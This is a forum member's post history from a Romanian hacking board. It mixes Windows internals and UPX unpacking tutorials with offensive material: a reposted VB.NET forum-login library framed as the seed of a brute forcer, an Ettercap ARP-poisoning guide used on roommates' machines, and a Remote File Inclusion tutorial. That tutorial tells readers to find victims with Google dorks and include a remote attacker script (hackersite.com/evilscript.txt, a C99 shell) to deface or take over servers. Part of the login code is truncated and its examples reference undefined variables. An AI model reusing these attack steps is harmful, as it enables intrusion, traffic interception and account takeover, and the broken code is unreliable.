-
Posts
571 -
Joined
-
Last visited
-
Days Won
4
Everything posted by me.mello
-
Deci daca merge pe RST dati o bere. Articolul original e de ceva vreme modificat de la phpBB3 MyBB si viceversa:))...a trecut prin multi leecheri insa e foarte folositor, daca ai idee ce sa faci cu el, asa ca o sa zic: Author: Anonim I've approached a slightly OOP way to code this. I used different classes and an abstract class named 'Forum'. Simple webrequests are used for the connections. Comments are welcome At this moment, it is possible to login to: - phpBB2 - phpBB3 - myBB - vBulletin (latest version) - IPB2 I'll add IPBv3 & SMF later on If you want me to add more forums, just reply Class 'Forum' 'Written by Webhouse @ HF, please add credits if you use this. Public MustInherit Class Forum Private _logindata As String Private _loginUrl As String Private _url As String Private _username As String Private _defaultCookieName As String Private _defaultCookieSearch As String Public Sub New(ByVal url As String, ByVal loginUrl As String, ByVal username As String, ByVal cookieName As String, _ ByVal cookieSearch As String, Optional ByVal data As String = "") Me._url = url Me.loginUrl = loginUrl Me.logindata = data Me.username = username Me._defaultCookieName = cookieName Me._defaultCookieSearch = cookieSearch End Sub Public MustOverride Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean Public Property logindata As String Get Return Me._logindata End Get Set(ByVal value As String) Me._logindata = value End Set End Property Public Property url As String Get Return Me._url End Get Set(ByVal value As String) Me._url = value End Set End Property Public Property loginUrl As String Get Return Me._loginUrl End Get Set(ByVal value As String) Me._loginUrl = value End Set End Property Public Property username As String Get Return Me._username End Get Set(ByVal value As String) Me._username = value End Set End Property Public Property defaultCookieName As String Get Return Me._defaultCookieName End Get Set(ByVal value As String) Me._defaultCookieName = value End Set End Property Public Property defaultCookieSearch As String Get Return Me._defaultCookieSearch End Get Set(ByVal value As String) Me._defaultCookieSearch = value End Set End Property End Class Class 'HTTPWorker' 'Written by Webhouse @ HF, please add credits if you use this. Imports System.Net Imports System.Text Imports System.IO.Compression Public Class HTTPWorker Public Shared cookies As CookieContainer Private data As Byte() Public Function login(ByVal forumInstance As Forum) As Boolean Dim request As HttpWebRequest Dim response As HttpWebResponse Dim stream As IO.Stream cookies = New CookieContainer Try request = WebRequest.Create(forumInstance.loginUrl) setConnectionParameters(request) data = Encoding.ASCII.GetBytes(forumInstance.logindata) request.ContentLength = data.Length stream = request.GetRequestStream() stream.Write(data, 0, data.Length) stream.Flush() stream.Close() response = request.GetResponse() If forumInstance.isLoggedIn(cookies) Then Return True End If Catch ex As Exception 'do something with the exception End Try Return False End Function Public Sub setConnectionParameters(ByRef request As HttpWebRequest) With request .Method = "POST" .Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" .ContentType = "application/x-www-form-urlencoded" .Proxy = Nothing .CookieContainer = cookies .KeepAlive = True .ServicePoint.Expect100Continue = False .UserAgent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8) Gecko/20051111 Firefox/1.5; FBI-version/0.07" '.Headers.Add(HttpRequestHeader.AcceptEncoding, "gzip,deflate") if you want to speed up the steam reading (most boards support this) End With End Sub 'this function not implemented, it is added to show how to link the cookies from the login Public Sub navTo() 'Dim request As HttpWebRequest 'request.CookieContainer = cookies 'etcetc: you could set idletime, speed if you simultaniously want to fire requests, headers, method (get/post), etc End Sub 'Note: to read the result in login() '--If you want to read the result (using compression techniques to speed it up-- 'Dim responseStream As IO.Stream = response.GetResponseStream() 'If (response.ContentEncoding.ToLower().Contains("gzip")) Then ' responseStream = New GZipStream(responseStream, CompressionMode.Decompress) 'ElseIf (response.ContentEncoding.ToLower().Contains("deflate")) Then ' responseStream = New DeflateStream(responseStream, CompressionMode.Decompress) 'End If 'Dim streamReader As IO.StreamReader = New IO.StreamReader(responseStream, Encoding.Default) 'Dim result As String = streamReader.ReadToEnd().Trim() 'streamReader.Close() '-- End Class Class 'phpBB2' 'Written by Webhouse @ HF, please add credits if you use this. Imports System.Net Public Class phpBB2 Inherits Forum Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String) MyBase.New(url, url & "/login.php", username, "phpBB_WBB_data", "userid%22%3Bi%3A-1%3B%7D", "&username=" + _ username + "&password=" + password + "&autologin=on&login=Log+in") End Sub Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean If Not cookies.GetCookies(New Uri(url)).Item(defaultCookieName).Value.Contains(defaultCookieSearch) Then Return True End If Return False End Function End Class Class 'phpBB3' 'Written by Webhouse @ HF, please add credits if you use this. Imports System.Net Public Class phpBB3 Inherits Forum Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String) MyBase.New(url, url & "/ucp.php?mode=login", username, "phpbb3_1fh61_u", "1", _ "username=" + username + "&password=" + password + "&redirect=&sid=&redirect=&login=Login") End Sub Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean If Not cookies.GetCookies(New Uri(url)).Item(defaultCookieName).Value.Equals(defaultCookieSearch) Then Return True End If Return False End Function End Class Class 'myBB' 'Written by Webhouse @ HF, please add credits if you use this. Imports System.Net Public Class myBB Inherits Forum Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String) MyBase.New(url, url & "/member.php?action=login", username, "mybbuser", "", "username=" + username & "&password=" + password & "&submit=Login&action=do_login&url=") End Sub Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then Return True End If Return False End Function End Class Class 'vBulletin' 'Written by Webhouse @ HF, please add credits if you use this. Public Class vBulletin Inherits Forum Public Sub New(ByVal url As String, ByVal username As String, _ ByVal password As String) MyBase.New(url, url & "/login.php?do=login", username, "vbseo_loggedin", "yes") MyBase.logindata = "vb_login_username=" + username + "&vb_login_password=" + password + _ "&cookieuser=1&s=&securitytoken=guest&do=login&vb_login_md5password=" + Md5String(password) + _ "&vb_login_md5password_utf=" + Md5String(password) End Sub Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then If cookies.GetCookies(New Uri(url)).Item(defaultCookieName).Value.Contains(defaultCookieSearch) Then Return True End If End If Return False End Function Private Function Md5String(ByVal v As String) As String Dim myProv As New System.Security.Cryptography.MD5CryptoServiceProvider Dim b As Byte() = System.Text.Encoding.ASCII.GetBytes(v) b = myProv.ComputeHash( Dim str As String = "" Dim i As Integer For i = 0 To b.Length - 1 str = (str & b(i).ToString("x2").ToLower) Next i Return str End Function End Class Class 'IPB2' Public Class IPBoard2 Inherits Forum Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String) MyBase.New(url, url & "/index.php?act=Login&CODE=01", username, "ipb_username", "", _ "&referer=" + url + "&UserName=" + username + "&PassWord=" + password + "&CookieDate=1") End Sub Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then Return True End If Return False End Function End Class Notes: The only reason I have put the actual forums in different classes is because: - A different version can have different functionalities you want to implement - The post string is different (I could have put a string container though for all the classes, but I didn't ~ see previous point) If you want to add different types of forums, just let your forum inherit from the class 'Forum', you'll want to include a cookie name (and maybe value) to verify if the user is logged in. You'll always will need to override the isLoggedIn() method aswell. I don't read the actual html from the response because it is just timewaiste, checking cookies is much faster. You can easily change the sync webrequests into async ones if you would want to login to different sites simulaniously. I might post a tutorial later on about this. Examples to add forumobjects and login: Dim wrkr As New HTTPWorker() 'Dim phpBB2Forum As New phpBB2("http://www.myurl.com", "username", "pass") wrkr.login(wbb) Dim vBulletinForum As New vBulletin("http://www.myurl.com", "username", "pass") wrkr.login(cf) Dim myBBForum As New myBB("http://www.myurl.com", "username", "pass") wrkr.login(bb) Dim phpBB3Forum As New phpBB3("http://www.myurl.com", "username", "pass") wrkr.login(phpBB3Forum) Va mai zic odata All credits to the original poster!! Acum sa ridice mana care nu s-a gandit deja la un brute forcer=))
-
Ce e mai frumos decat MoveMemory si CopyMemory:X super deja am idei de a imbunatati ExecuteBytes , ai postat si ceva de genu in c++ daca nu ma insel. Cam sacadeaza functia...nu vad ZeroMemory sau CloseHandle la hProcess sau hThread dar probabil a facut el versiunea standard, cand lucrezi cu astfel de functii le mai dai si free la urma, MoveMemory e o functie destul de volatila mai ales in vb. Oricum e super functia, e altceva fata de ce mai vazusem prin trecut.
-
Turcia aresteaza 32 de membri ai retelei Anonymous
me.mello replied to x6IT32's topic in Stiri securitate
Da @paul mi-ai confirmat exact ce am spus si eu, acum nustiu ce crezi tu, dar daca tu imi vii maine cu un cliseu gen ddos eu iti zic hacker? Guvernul american da mai multi bani pentru fabricarea armamentului decat pentru combaterea tuturor bolilor care nu li s-au descoperit inca tratamentu, daca vreodata vreun guvern al unei tari mai mari si mai importante va fi atacat, vor fi luate masuri si eu imi pun coitele in joc daca aia nu vor fi prinsi pe viitor. Nu uitati, am mai zis si voi mai spune America Centrala are un sistem cat de cat bine pus la punct, ei se lauda cu orice bit ce iese si intra din tara e logat...acuma bine la cati intra nu spun ca fac o treaba asa de buna angajatii:)) (logat nu inseamna securizat sau ca nasa numai poata fi sparta de domnul tinky:)) ) si in caz de un atac mai mare...vor sti exact sursa/ tipul atacului si de unde vine ca si in cazul atacurilor din china. Drept dovata turcii au confirmat treaba asta,odata trebuie sa ti se intample a 2-a oara esti precaut...si la nivel de guvern nu e problema lovela,ai lovele angajezi 2, 10, nspe baietasi proaspeti iesiti din harward care te gaseste cu tot cu boti si n proxy. Concluzia: Atat timp cat ramai un mit, cu uneltele tale, nimeni niciodata vreun guvern no sa puna ghiara pe tine, indiferent ca esti legiune/clan/grup/gradinita/solo. -
Turcia aresteaza 32 de membri ai retelei Anonymous
me.mello replied to x6IT32's topic in Stiri securitate
Acum 10-15 ani daca erai un grup de hackeri cunoscut aveai unelte custom, astia ce au??? ddos? sa fim seriosi... imi aduce aminte de alt topic asemanator. Din atatia cat se cred ei...o legiune nu se gaseste unu sa faca un soft bun??? sa gaseeasca un tip de atac care va vi cliseu in viitor?? Daca era vorba de o grupare bine pusa la punct de ii zici legiune...te faceai public dupa ce aveai si tu vreo 3-4 ani de ASM si vreo 5-6 certificate CISCO, si daca recrutai o legiune te durea la vasile...dar macar 50% sa aibe habar si sa descopere tipuri de atacuri, vulnerabilitati 100% private + unelte facute de ei. In trecut chinezii nici nu cred ca aveau pc atunci cand in spania 1 din 5 persoane intre 16-25 ani era hacker, a fost si un documentar despre asta si spunea destul de clar sunt din x-team, avem uneltele custom, am dat la unu atat $$ pentru unealta asta, asta ne difera de altii. Daca o tii in cliseuri tip ddos normal ca nu ai sperante in "a schimba lumea" cum declar ei. In ziua de azi ori daca iesi in strada si ameninti ca iti dai foc, sau ataci atea firme le faci ddos, lumea nu o poti schimba, uneori asa trebuie sa decurga lucrurile, nu ai descoperit ceva gata iti faci legiune de hackeri, impresii din astea ai intre 4 pereti, pentru ca intodeauna se vor gasi bani pentru a contracara niste pustani pusi pe glume,sunt oameni cu facultate, cu ani de research in domeniu care abia asteapta niste banuti in plus. Sincer, nu cred ca sunt sageti, desi cred ca totusi va creea valvata printre hackeri fie ei minori:)) sau mai mari. Ar fi bine daca s-ar anonimiza, cred ca ar rezolva ceva pana la urma...oricum simt cliseul "netscape" daca ei vor pica vor veni altii sa faca legea, e posibil sa fie doar inceputul...plm in ziua de azi poti sa faci hack si la o masina ce dreq:)) @FearDotCom: nu puteam sa nu revin cu edit pentru tine:)) tu omule ai idee ca un francez a intrecut recordul mondial si a ajuns la o banda de 7.2 tera()sa iti zic pe romaneste) pe secunda pe o raza de 7040 kilometri??recordul anterior fusese de 3.2 tb/ps, cand vreodata ai sa rezolvi tu cu ddos ceva in viata asta?? ai idee ca de atunci pobabil s-a ajuns la 10 tb/ps? daca mai ai si protectie nici daca dublezi pc-urile dupa planeta asta mica si rotunda nu le faci fata...zic asta pentru ca din cauza individului asta francez multe guverne au luat aceasta masura....au banda de fac susulica pe boti tai ma @FearDotCom iar daca nu ma crezi chiar am revista in fata imi vine lunar in posta:D Tehnology Review septembrie/octombrie 2010 pagina 66. -
Un articol super, daca iti intra in mana cu usurinta vei invata sa injectezi/elimini un .dll din orice remote process vei dori. About the DLL Reference Count Reference count or load count of the DLL is the number of times the DLL is loaded into the process. Each time the DLL is loaded (through LoadLibrary) into the process its reference count is incremented by 1 and each time the DLL is freed (through FreeLibrary) from the process, reference count is decremented by 1. When the reference count reaches 0, the DLL is completely unmapped from the process. Windows APIs does not give much information about loaded DLLs. Windows provides Tool Help library to retrieve information about DLLs loaded into process but it gives very basic information such as name, handle of DLL. In order to get more information, one need to dig deeper into the windows world. How to find the DLL Reference Count? Reference count for the DLL is stored in the PEB (Process Environment Block) for that process. PEB contains the linked list of DLL Module structures which contain complete information about that particular DLL. Here are the detailed steps. 1. Get address of PEB block PEB block for any process is usually found at address 0x7ffdf000. However there is standard way to get this address. There is undocumented function ZwQueryInformationProcess from NTDLL.DLL which can be used to retrieve the PROCESS_BASIC_INFORMATION. The PBI structure is shown below. struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION; The second member PebBaseAddress contains the address of PEB which can be used to get the list of loaded modules. 2. Get list of loaded DLLs from PEB. Once you get the address of PEB, you can use use ReadProcessMemory API to read the PEB from the target process. PEB peb; ReadProcessMemory(hprocess, pbi.PebBaseAddress, &peb, 16, &dwSize) PEB is a big structure hence I cannot dump it here. One of the member that is interesting to us is PPEB_LDR_DATA which is pointer to loader data structure containing linked list of loaded modules. Now from PEB, you can get PEB_LDR_DATA structure as follows. PEB_LDR_DATA peb_ldr_data; ReadProcessMemory(hprocess, peb.Ldr, &peb_ldr_data, sizeof(peb_ldr_data), &dwSize); struct _PEB_LDR_DATA { ULONG Length; UCHAR Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID EntryInProgress; } PEB_LDR_DATA, *PPEB_LDR_DATA; PEB_LDR_DATA structure contains the pointers to 3 linked lists each of which list the modules in different order. Now its just a matter of going through each module by following one of this linked list. 3. Retrieve load count of the DLL. Now we will go through each of the modules by following the InLoadOrderModuleList pointer. Information about each of these modules is retrieved using ReadProcessMemory function. The structure LDR_MODULE representing each module is given below. struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; It contains lot of information about a module which you don't get using high level APIs. One of the member is LoadCount which is nothing but the reference count of the DLL. LDR_MODULE peb_ldr_module; void *readAddr = (void*) peb_ldr_data.InLoadOrderModuleList.Flink; // Go through each modules one by one in their load order. while( ReadProcessMemory(hprocess, readAddr, &peb_ldr_module, sizeof(peb_ldr_module), &dwSize) ) { // Get the reference count of the DLL loadCount = (signed short)peb_ldr_module.LoadCount; readAddr = (void *) peb_ldr_module.InLoadOrderModuleList.Flink; } If load count for a DLL is -1 then the DLL is statically linked otherwise its dynamically loaded. Where this will be usefull? There are number of instances when there is a need to know the reference count of DLL. One typical case is when you want to free the DLL from the remote process. Many spyware programs uses the DLL injection or similar technique to get loaded themselves into the legitimate windows process and remain hidden from normal user. In order to free such hidden DLLs from that process one must know its reference count so that it can be completely freed from that process. Unless the DLL is freed from the process, it cannot be removed from the disk. Reference count is also useful to determine if the DLL is statically or dynamically loaded.
-
Bypassing Anti-virus using Code Injection Technique
me.mello replied to Nytro's topic in Tutoriale in engleza
Da il stiu pe maimutica ala de la Offensive;)) da e cam enervant cu in-time scanning asta...dar daca iti faci tu FUD e bine totusi sa te bazezi si pe o tehnica de gen(sa o ai ca batistuta la buzunar)..cine stie. http://rstcenter.com/forum/36270-manual-unpacking-upx-packed-binary-file.rst si asta iti poate creea idei -
In primul rand nu are mare legatura php cu c++ unu e pentru web altu e pentru aplicatii....cat despre c++ stati voi linistiti ca nu ati dat de greu inca..e usor cand introduci o librarie si poc...gata programelu' mai ales pe windows...dar cand vine vorba de algoritmi si matematica in c++ atunci zici ce dreq m-am apucat eu de c++. Cat despre php nu imi dau cu parerea pentru ca eu nu stiu prea mult, am ales sa invat asp pentru ce fac eu chiar nu am nevoie de php. C++ nu e programare web, daca te contraziceai cu omul intre php si java in html hai ca era altceva da intre php si c++ nu poti sa faci o comparatie insa ca limba de programare da cu siguranta c++ e mai complicat, complex, greu. In cazul asta ar putea avea dreptate, php poate fi nesemnificatif daca ai o anumita "franghie" pe care vrei sa o tii in viata. Nu poti programa telefoane mobile sau robotzei in php:)) Iar locuri de munca ar fi pe orice platforma, nu ca ala de programeaza in java ia mai mult ca ala in .net...e o greseala ai fi surprins cat ia un administrator pe groove(.net) va spun ca de cand ma stiu lucrez pe platforma .net si daca ai bani sa faci un curs in afara sa iei un certificat, nu doar eu o sa-ti spun dar iti vor spune si altii ca te vor astepta afara dupa examen care mai de care cu contracte mai bune. De cativa ani, s-a creeat o modularitate pe platforma web, faci scripturi ruby, python iti vine mai usor...iar php simplu nu face fata...nu cred ca are un nivel atat de mare fara java. Cat despre c++...ei bine el nu are nevoie de nimic, daca va aduceti aminte care stiti...limbajul de programare C s-a facut in C, hmm oare cum e posibil?? Concluzia: Nu conteaza ca programezi in c++, sau in php daca tie sau oricui programarea in php ii aduce mai mult $$ decat celuilalt care lucreaza de o viata in c++ e chiar neinteresant. Traim intr-o lume care incepe sa faca din ce in ce mai urat din cauza lipsei banilor. Cat despre ce zice amicul tau, dai peste nas daca habar nu are sa scoata vreun ban din orice limba de programare:)
-
Probabil si mai mult ca sigur nu e compilat neaparat in visual c++ 2008, daca e incearca cu visual c++ normal ala din 98, visual c++ 2008 e cu net framework...si nu cred ca e compilat mozilla cu asta:| Inca ceva...in c++ e o mare diferenta intre compilare, deci informeaza-te bine in ce e compilat, poate ce ai gasit tu e in dev c++ sau rad...etc, nu orice cod c++ merge compilat cu dev c++ de asemenea cu oricare dintre visual c++...etc. Daca compilarea unu open source iti creeaza probleme ma intreb acum cat habar ai tu despre programare, daca asta iti e problema sa stii ca ar fi trebuit sa stii, e o regula generala. Eu zic sa te uiti peste ce am zis, poate e o parte din problema sau daca nu chiar asta, bine acum e posibil sa fie si de la vreun runtime care nu il ai up to date, si iti face figuri la build. PS: habar nu am ince e compilat mozilla.
-
Introduction Here is a short tutorial on unpacking the UPX http://upx.sourceforge.net/ packed binary file. UPX is a free, portable, executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. To follow this tutorial you need to download latest UPX packer from UPX website http://upx.sourceforge.net/ and then pack any of the PE (windows executable) file with it. Unpacking Steps Before we begin with unpacking exercise, lets try to understand the working of UPX. When you pack any executable with UPX, all existing sections of that file are compressed and appended with new UPX code which decompresses entire packed sections during run time. During the execution of UPX packed binary file, following steps take place... First the current register status is saved through PUSHAD instruction Next all packed sections are unpacked. Resolve the import table of original executable file. Once the job is done, restore the register status via POPAD instruction Finally jump to Original Entry point (OEP) Unpacking UPX Manual unpacking process involves following steps Finding OEP of the program. Dumping the memory image of the binary when the program reaches OEP. Fixing the import table I am using the generic approach so that you will be able to unpack the executable which is packed with any version of UPX. Here I am using the OllyDbg Download to unpack the PE file. Although you can use any debugger, OllyDbg is one of the best ring 3 debugger for reverse engineering. That is all you needed to know before the start. Lets get into some action. Load the UPX packed binary file into the OllyDbg and start tracing the binary, until you encounter a PUSHAD instruction. Usually this is the first instruction or it will be present in the first few instructions based on the UPX version that you have used to pack the PE file. Now put the breakpoint on POPAD instruction. So when we reach POPAD instruction, all the sections will be unpacked and all imports will be resolved. After POPAD instruction, it will jump to OEP. There are many ways to set the breakpoint at the PUSHAD instruction. When you are at this instruction, you can put the hardware read breakpoint at ESP-4 address. If you have command bar plugin installed then you can just type 'hr esp-4' to set this breakpoint. Other way is to find the POPAD (opcode 61) instruction in the code and set the breakpoint for yourself. You can just scroll down in OllyDbg from the current instruction till you find all zeroes, then just few instructions above the start of zeroes you will find the POPAD instruction. Now you can directly set breakpoint on POPAD instruction. Once you have set the breakpoint, press F9 and you will break on the instruction which is immediately after POPAD or on POPAD instruction based on which method you have used. Now start tracing with F7 and soon you will encounter a instruction which will jump to OEP that is somewhere in the unpacked code section. Now you have found the OEP. Note down this address somewhere. Next task is to dump the entire binary image from memory. This can be done using OllyDmp plugin which comes with OllyDbg. Now launch this plugin and dump the entire binary file to the disk using default options. It will automatically fix the import table for you so there is no need to explicitly fix it. That's it and you are done with unpacking the UPX packed file. Fixing Import Table For most of the advanced packers, OllyDmp will not be able to fix the import table. In such a case, following method will be helpful. Here, we will be using the ImpREC tool which is more advanced tool for fixing import table. When you are at the OEP of the program, just dump the memory image of binary file using Ollydmp without asking it to fix the import table. Next launch the ImpREC tool and select the process that you are currently debugging. Then in the ImpREC, enter the OEP (enter only RVA, not a complete address) and click on 'IAT Autosearch' button to automatically search for import table. Then click on 'Get Imports' to retrieve all the imported functions. You will see all the import functions listed under their respective DLL names. If you find any import function which is invalid (marked as valid : No) then remove it by right clicking on it and then from the popup menu, press on 'Delete Thunks'. Now once the import functions are identified, click on Fix Dump button in ImpREC and then select the previously dumped file. Once you have dumped the image from memory and fixed the import table, you can verify it by executing that application. UPX Unpacked...! That's all, you have successfully unpacked the UPX packed executable file. Its great job though its the simplest packer without any anti debugging features. As you move on, you will see more and more challenging protectors. Hope you have enjoyed your first unpacking lesson as I did years back..!
-
Author: Dangwal Introduction Ettercap is one of the best sniffing tools available today, but when it comes to using it on non-security-distro's on which it is not pre-configured to use with like Fedora, you might land into some problems like me. It all started on a sunny day when I actually thought to try it on Fedora Linux. PS : I won't be covering ncurses as its quite easy & offers little to no hassles in operations, gave me no errors in operation strangely. Installation of Ettercap Anyways..I installed ettercap it by typing - [root@zion xero]#su Password: [root@zion xero]# yum install ettercap or [root@zion xero]# yum install ettercap-gui ( I actually had problems with this one..) Yum resolved dependencies & installed it, I ran it on my local lan network assuming to run it on default configuration. [root@zion xero]# ettercap -T -Q -M ARP //192.168.1.3 It successfully captured all the packets & I was able to get details about capturing. The real problems started when I started to run it on GUI mode. [root@zion xero]# ettercap -G Playing Cat & Mouse with Ettercap On lauch, the gtk gui popped up & prompted me to the stuff. I quickly pressed shift + U to choose network interface ( in this case my local lan network hooked up to my roommates laptops ), & chose 'eth0' the default Ethernet interface. I went ahead by scanning for hosts by pressing "ctrl + s" & bam..it crashed. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Ooops ! This shouldn't happen... Segmentation Fault... Please recompile in debug mode, reproduce the bug and send a bugreport okay..I got it..it might need to be crashing cause it has not been updated since a long time. Ah well, I compromised it by scanning partially for hosts & then running it. Again, I chose the host, added it to my target,mitm & started ARP poisoning (using the menu) & then started with unified sniffing. I got nothing. Realizing it was not backtrack, I sensibly closed it ( rearping the network..not by deliberately closing it like windows users do by abusing the [X] button) & opened etter.conf [root@zion xero]# vi /etc/etter.conf & uncommented the iptables option to look like this # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" saved it, ran it again. Again, the same drill, partial hosts scanning,target selection,mitm,arping,sniffing. bang, I got nothing..again. I looked at the console output & found - [root@zion xero]# ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA iptables v1.3.3: can't initialize iptables table `nat': Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded. wow..I am running the program as root , edited the read only file as root & all i got was to upgrade my kernel ? bullshit! Anyways..back to etter.conf , this time I changed the privileges to 0 [privs] ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default The program ran & the error went away but still..i was unable to capture anything in the GUI mode, guess the more user friendly you make it, the more hassles you add with it...sheesh. I was into new stuff like after 10 minutes of waiting I got this - SEND L3 ERROR: 44 byte packet (0800:06) destined to 192.168.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted) Great...now this was what I was talking about. Now this really got me moving. Its not like every day when you can target a network in CUI using one command of a program but using a GUI has a lot of strings attached. Now I did everything very carefully, although I was still not able to figure out the real reason of "Segmentation Fault problem" , but I guess everything works fine if you do it like this ? Configure etter.conf like I stated above, set uid to 0 & uncomment iptables section. run ettercap using kdesu, yep ran it with elevated privileges in kde environment to avoid "cant initialize iptables error". [root@zion xero]# kdesu ettercap -G give your password , & choose network interface (shift + U). Once done, please be patient, open a new terminal window, change to root & type this command (forwards packets, avoids error ) - [root@zion xero]# echo "1" > /proc/sys/net/ipv4/ip_forward it will avoid the "SEND L3 ERROR" . Finally Cat gets Mouse ! Once done, do your drill & you will be "finally" able to capture data using GUI. For the rest of elites out there, I guess [root@zion xero]# ettercap -T -Q -M arp:remote -i eth0 /192.168.1.3/ // Seems to work man...What a trip... I would choose wireshark over it any day... Conclusion If you have ever got into problems while trying to run Ettercap on your Linux box then this guide will help you to get rid of some of those nasty errors and let you smooth sailing.
-
Author: Punter About XSSer Tool XSSer http://xsser.sourceforge.net/ is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections in any website. In this introductory article I will show you how easy to use the XSSer for Detection and Exploitation of XSS in a vulnerable website. In action with XSSer Here we will experiment this tool on following test vulnerable website, acuforum forums Below are simple steps on using XSSer. root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser root@punter:/pentest/web# cd xsser root@punter:/pentest/web/xsser# python XSSer.py -u 'http://testasp.vulnweb.com' -g 'Search.asp?tfSearch=' -proxy 'http://127.0.0.1:8118? -referer '666.666.666.666? -user-agent 'correct audit' -Fuzz -s XSSer Action Screenshots After you execute above sequence of commands you can see the results as shown in the sequence of screenshots below. Screenshot 1: Testing the vulnerable website for XSS Injections using XSSer Screenshot 2: Testing the vulnerable website for XSS Injections using XSSer [Continued] Screenshot 3: Final results of XSS Detection operation. You can see that XSSer has already found couple of XSS flaws in our test website. Exploitation of XSS Injections In the above screenshot, the text marked in blue indicates attack vector which can trigger XSS Injections on this website. Now we can go ahead and manually verfy these injections and it does not take long. Below is the screenshot showing successful exploitation of detected XSS Injection. Conclusion This article shows how easy to use XSSer tool to detect those hidden XSS flaws in any website using very simple steps. You can rest your brain for the time being while XSSer does all the job for you. Download XSSer: http://xsser.sourceforge.net/ ><
-
- 1
-
Author: Punter About DirBuster DirBuster https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project is a multi threaded Java based application designed to brute force directories and files names on web/application servers. During Web Application Pentesting finding the sensitive directories files and folders is always a quite tough work. Now a days we often don't see those default installation files/directories as in the olden days and finding out the sensitive pages really gets challenging. In such cases, DirBuster helps in finding those unknown and sensitive file names and directories. This can prove to be a great information to start with in a real web penetration testing. In action with DirBuster Now i will be showing you how easy it is to use Dirbuster to find those sensitive directories and files on webservers. Here for the demo purpose I will be using Mutillidaehttp://www.owasp.org/index.php/Category:OWASP_Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10. Here are the steps to run DirBuster 1. cd /pentest/web/dirbuster 2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/ Once you start the Dirbuster it will appear as shown in the screenshot below Now browse and select the 'directory bruteforce lists' from the DirBuster folder (example: directory-list-1.0.txt) as shown below Now run the start button and you will see Dirbuster starting bruteforcing the filenames & directories on the webserver as shown below. In the black window you can see all the filenames and directories discovered by Dirbuster. One of the discovered file '../passwords/accounts.txt' looks interesting. On opening you will see that it has the passwords related to webserver accounts. Conclusion Finding out those hidden files and directories on the webserver is a tedious task for anyone involved in web application pentesting. DirBuster makes that task much simpler and faster with its easy to use GUI interface. Even the webserver owners can easily use this tool to remove any of the sensitive files/directories from their webservers and taking it one step further in securing their servers.
-
zici tu zici dar chiar are dreptate:)) google translate chiar da gigi becali:)) ps: unitatea de masura a prostiei este???? ==BECALU'
-
Author: Rishabh Dangwal RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two. RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux. Starting with RFI Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website http://victimsite.com/index.php?page=home As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out. http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt I have included a custom script "evilscript" in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen Case 1 - You might have noticed that the url consisted of "page=home" had no extension, but I have included an extension in my url,hence the site may give an error like 'failure to include evilscript.txt.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server. Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte '%00' in order to avoid error. Case 3 - successfull execution Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in 